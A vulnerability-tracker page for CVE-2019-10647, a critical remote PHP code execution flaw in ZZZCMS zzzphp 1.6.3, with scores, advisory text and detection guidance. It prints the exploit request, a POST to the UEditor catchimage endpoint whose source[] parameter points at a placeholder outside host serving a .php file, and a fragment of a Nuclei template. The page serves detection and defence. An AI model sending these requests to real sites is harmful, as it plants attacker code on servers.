CVE-2019-10647
published 2019-03-30CVE-2019-10647: ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[]…
PriorityP277critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
6.59%
93.0th percentile
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zzzcms | zzzphp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
path/inc/zzz_file.php
path/upload/
commandPOST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
Content-Type: application/x-www-form-urlencoded
source[]=http://{{interactsh-url}}/{{randstr}}.php
- →Detect exploitation attempts by monitoring POST requests to /plugins/ueditor/php/controller.php with action=catchimage and a source[] parameter containing a .php URL ↗
- →A successful exploitation results in a JSON response containing both 'SUCCESS' and 'state' fields with HTTP 200, followed by a GET request to /upload/<filename> to retrieve the dropped PHP file
- →Monitor for out-of-band DNS interactions triggered by the catchimage endpoint fetching attacker-controlled URLs ending in .php — indicative of SSRF/RCE probe
- →The exploit requires the attacker-controlled server to serve PHP code as plain text (not interpreted), so look for HTTP responses with PHP code bodies being fetched by the target server
- →After the catchimage fetch, the uploaded PHP file is stored under /upload/ and can be accessed via GET — monitor for GET requests to /upload/*.php as a sign of post-exploitation access
- ·Exploitation requires the attacker-controlled server to serve the .php file as plain text (Content-Type: text/plain or similar) rather than executing it — the vulnerability is in the target's lack of file-type restriction, not the source server's PHP execution ↗
- ·The Nuclei template uses a two-step flow: step 1 triggers the catchimage fetch and confirms DNS OOB interaction + SUCCESS response; step 2 GETs the uploaded file — both steps must succeed for confirmed exploitation
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pgwh-xwg9-pvxq: ZZZCMS zzzphp v1
ghsa_unreviewed·2022-05-14
CVE-2019-10647 [CRITICAL] CWE-434 GHSA-pgwh-xwg9-pvxq: ZZZCMS zzzphp v1
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).
VulnCheck
zzzcms zzzphp Unrestricted Upload of File with Dangerous Type
vulncheck·2019·CVSS 9.8
CVE-2019-10647 [CRITICAL] zzzcms zzzphp Unrestricted Upload of File with Dangerous Type
zzzcms zzzphp Unrestricted Upload of File with Dangerous Type
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).
Affected: zzzcms zzzphp
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2019-10647
No detection rules found.
Nuclei
ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
nuclei·CVSS 9.8
CVE-2019-10647 [CRITICAL] ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter, exploit requires attacker to send malicious URL and server to serve PHP code as plain text.
Template:
id: CVE-2019-10647
info:
name: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
author: Sourabh-Sahu
severity: critical
description: |
ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter, ex
No writeups or analysis indexed.
2019-03-30
Published
Exploited in the wild